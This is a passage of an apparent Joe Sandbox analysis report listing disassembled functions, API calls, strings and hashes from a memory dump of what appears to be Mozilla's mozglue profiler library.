                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA9F09B
                                                                                                                                                                                                                                        • Part of subcall function 6BA75B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6BA756EE,?,00000001), ref: 6BA75B85
                                                                                                                                                                                                                                        • Part of subcall function 6BA75B50: EnterCriticalSection.KERNEL32(6BADF688,?,?,?,6BA756EE,?,00000001), ref: 6BA75B90
                                                                                                                                                                                                                                        • Part of subcall function 6BA75B50: LeaveCriticalSection.KERNEL32(6BADF688,?,?,?,6BA756EE,?,00000001), ref: 6BA75BD8
                                                                                                                                                                                                                                        • Part of subcall function 6BA75B50: GetTickCount64.KERNEL32 ref: 6BA75BE4
                                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6BA9F0AC
                                                                                                                                                                                                                                        • Part of subcall function 6BA75C50: GetTickCount64.KERNEL32 ref: 6BA75D40
                                                                                                                                                                                                                                        • Part of subcall function 6BA75C50: EnterCriticalSection.KERNEL32(6BADF688), ref: 6BA75D67
                                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6BA9F0BE
                                                                                                                                                                                                                                        • Part of subcall function 6BA75C50: __aulldiv.LIBCMT ref: 6BA75DB4
                                                                                                                                                                                                                                        • Part of subcall function 6BA75C50: LeaveCriticalSection.KERNEL32(6BADF688), ref: 6BA75DED
                                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BA9F155
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9F1E0
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F1ED
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F212
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9F229
                                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA9F231
                                                                                                                                                                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BA9F248
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9F2AE
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F2BB
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F2F8
                                                                                                                                                                                                                                        • Part of subcall function 6BA8CBE8: GetCurrentProcess.KERNEL32(?,6BA531A7), ref: 6BA8CBF1
                                                                                                                                                                                                                                        • Part of subcall function 6BA8CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BA531A7), ref: 6BA8CBFA
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BA64A68), ref: 6BA9945E
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BA99470
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BA99482
                                                                                                                                                                                                                                        • Part of subcall function 6BA99420: __Init_thread_footer.LIBCMT ref: 6BA9949F
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9F350
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F35D
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F381
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9F398
                                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA9F3A0
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9F489
                                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA9F491
                                                                                                                                                                                                                                        • Part of subcall function 6BA994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BA994EE
                                                                                                                                                                                                                                        • Part of subcall function 6BA994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BA99508
                                                                                                                                                                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BA9F3CF
                                                                                                                                                                                                                                        • Part of subcall function 6BA9F070: GetCurrentThreadId.KERNEL32 ref: 6BA9F440
                                                                                                                                                                                                                                        • Part of subcall function 6BA9F070: AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F44D
                                                                                                                                                                                                                                        • Part of subcall function 6BA9F070: ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F472
                                                                                                                                                                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BA9F4A8
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9F559
                                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA9F561
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9F577
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F585
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F5A3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • [I %d/%d] profiler_resume, xrefs: 6BA9F239
                                                                                                                                                                                                                                      • [I %d/%d] profiler_resume_sampling, xrefs: 6BA9F499
                                                                                                                                                                                                                                      • [I %d/%d] profiler_pause_sampling, xrefs: 6BA9F3A8
                                                                                                                                                                                                                                      • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6BA9F56A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                                                                                                                                                                                      • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                                                                                      • API String ID: 565197838-2840072211
                                                                                                                                                                                                                                      • Opcode ID: 751b34166c84e2cd62d543e2b5cf1e5fb36d1d0b1f7e0bf38a7f799a6501496f
                                                                                                                                                                                                                                      • Instruction ID: 181bce595a2af47d940cabaf270bea8bc0590e74e90f1565b28629ec2e339d5e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 751b34166c84e2cd62d543e2b5cf1e5fb36d1d0b1f7e0bf38a7f799a6501496f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3ED14A755183009FDF00AF38E84975B77E8EBC6728F14862EF96543280DB7AD885C7A2
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,6BA9E2A6), ref: 6BA9E35E
                                                                                                                                                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6BA9E2A6), ref: 6BA9E386
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9E3E4
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9E3F1
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6BA9E4AB
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9E4F5
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9E577
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9E584
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9E5DE
                                                                                                                                                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6BA9E8A6
                                                                                                                                                                                                                                        • Part of subcall function 6BA5B7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6BA5B7CF
                                                                                                                                                                                                                                        • Part of subcall function 6BA5B7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6BA5B808
                                                                                                                                                                                                                                        • Part of subcall function 6BAAB800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6BAD0FB6,00000000,?,?,6BA9E69E), ref: 6BAAB830
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000000), ref: 6BA9E6DA
                                                                                                                                                                                                                                        • Part of subcall function 6BAAB8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6BAAB916
                                                                                                                                                                                                                                        • Part of subcall function 6BAAB8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6BAAB94A
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BA9E864
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA9E883
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
                                                                                                                                                                                                                                      • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                                                                                                      • API String ID: 2698983630-53385798
                                                                                                                                                                                                                                      • Opcode ID: dff5cac897cbf8d5ec3a7da5f09c79a16cf6d633c1560ac0316f286448195f9f
                                                                                                                                                                                                                                      • Instruction ID: 227b85d4257a9d82c574372d248a8558b3cff0aceb5457f2a6b7d08f84f95dda
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dff5cac897cbf8d5ec3a7da5f09c79a16cf6d633c1560ac0316f286448195f9f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1902CF71614305DFCB10DF28D484A6ABBF5FF89304F44892CE9968B341DB39E989CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADE744), ref: 6BA67885
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADE744), ref: 6BA678A5
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADE784), ref: 6BA678AD
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADE784), ref: 6BA678CD
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADE7DC), ref: 6BA678D4
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000158), ref: 6BA678E9
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6BA6795D
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000160), ref: 6BA679BB
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6BA67BBC
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000158), ref: 6BA67C82
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADE7DC), ref: 6BA67CD2
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6BA67DAF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavememset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 759993129-0
                                                                                                                                                                                                                                      • Opcode ID: ef41aba63f454b85fca42bb8dec5de239c3da05c8b3520c22044f044798e2c55
                                                                                                                                                                                                                                      • Instruction ID: 5b3d3da73e7a9c2579feb8840dfbda20f4e95247545521ebec59b6f45f2a641d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef41aba63f454b85fca42bb8dec5de239c3da05c8b3520c22044f044798e2c55
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3024B71A542198FDF54CF18C984799B7B5FF88354F2982AADC09A7241E734AED1CF80
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BA951DF
                                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BA9529C
                                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6BA952FF
                                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BA9536D
                                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BA953F7
                                                                                                                                                                                                                                        • Part of subcall function 6BA8AB89: EnterCriticalSection.KERNEL32(6BADE370,?,?,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284), ref: 6BA8AB94
                                                                                                                                                                                                                                        • Part of subcall function 6BA8AB89: LeaveCriticalSection.KERNEL32(6BADE370,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284,?,?,6BA756F6), ref: 6BA8ABD1
                                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6BA956C3
                                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6BA956E0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6BA956BE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
                                                                                                                                                                                                                                      • String ID: MOZ_PROFILER_RECORD_OVERHEADS
                                                                                                                                                                                                                                      • API String ID: 1227157289-345010206
                                                                                                                                                                                                                                      • Opcode ID: 2275813507eb08fe08be0fba237a8e615ade614d9d90cd22387269ce11d2127e
                                                                                                                                                                                                                                      • Instruction ID: 57899e6e320824d30cc8a692cae15e6e18256949a4dfa6ef3f5c6c9b6e1ca196
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2275813507eb08fe08be0fba237a8e615ade614d9d90cd22387269ce11d2127e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05E19071868F458ACB12DE34D45126BB7F6BF9B381F10CB4EE8AE2A550DF34E4869301
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6BAB7046
                                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6BAB7060
                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6BAB707E
                                                                                                                                                                                                                                        • Part of subcall function 6BA681B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6BA681DE
                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6BAB7096
                                                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BAB709C
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 6BAB70AA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                                                                                                                                                                                      • String ID: ### ERROR: %s: %s$(null)
                                                                                                                                                                                                                                      • API String ID: 2989430195-1695379354
                                                                                                                                                                                                                                      • Opcode ID: deb0b4bf29796480fb21b4fe08b9cadf2bffe866f2d9c06822da3d8e1457c16f
                                                                                                                                                                                                                                      • Instruction ID: 65a43fb528b5f42435214a15ec5e8bf2a85b41e3e437f357ebb289ca388b21da
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: deb0b4bf29796480fb21b4fe08b9cadf2bffe866f2d9c06822da3d8e1457c16f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5501B9B1900204BFDF009BB4DC4ADAF7BBCEF89255F410529FA05A3241EA75E9598BA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BA69B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6BABB92D), ref: 6BA69BC8
                                                                                                                                                                                                                                        • Part of subcall function 6BA69B80: __Init_thread_footer.LIBCMT ref: 6BA69BDB
                                                                                                                                                                                                                                      • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6BA603D4,?), ref: 6BABB955
                                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6BABB9A5
                                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6BABBA20
                                                                                                                                                                                                                                      • RtlNtStatusToDosError.NTDLL ref: 6BABBA7B
                                                                                                                                                                                                                                      • RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6BABBA81
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6BABBA86
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1753913139-0
                                                                                                                                                                                                                                      • Opcode ID: 68651cb81fc941b8a5e66e32f65a5aff7c7f4abbe2ea9c1b50350b554f94f710
                                                                                                                                                                                                                                      • Instruction ID: 439ce405d8196d12364a4d4d53b7a320fc5948234830c863a1935b6e843fed23
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68651cb81fc941b8a5e66e32f65a5aff7c7f4abbe2ea9c1b50350b554f94f710
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F518171E00219DFDF14CFA8D9C1ADEBBBAEF88714F544229E911B7200D734AD818B91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BA8FA80: GetCurrentThreadId.KERNEL32 ref: 6BA8FA8D
                                                                                                                                                                                                                                        • Part of subcall function 6BA8FA80: AcquireSRWLockExclusive.KERNEL32(6BADF448), ref: 6BA8FA99
                                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BAB1563), ref: 6BA98BD5
                                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BAB1563), ref: 6BA98C3A
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6BAB1563), ref: 6BA98C74
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6BAB1563), ref: 6BA98CBA
                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6BA98CCF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2153970598-0
                                                                                                                                                                                                                                      • Opcode ID: b0b0a8cae0ca3b310b8060d9f4733328b77279dd59f59bfb14b544f52a93165b
                                                                                                                                                                                                                                      • Instruction ID: 81974de7847b31a82bcf609403a28dace304457c7bf6ff4678623135a835b61e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0b0a8cae0ca3b310b8060d9f4733328b77279dd59f59bfb14b544f52a93165b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B71AF75A14B008FCB04DF29D58061AB7F1FF88314F058A9EE9999B762E774E8C0CB41
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6BA5F2B4
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 6BA5F2F0
                                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6BA5F308
                                                                                                                                                                                                                                      • RtlNtStatusToDosError.NTDLL ref: 6BA5F36B
                                                                                                                                                                                                                                      • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6BA5F371
                                                                                                                                                                                                                                      Memory Dump Source
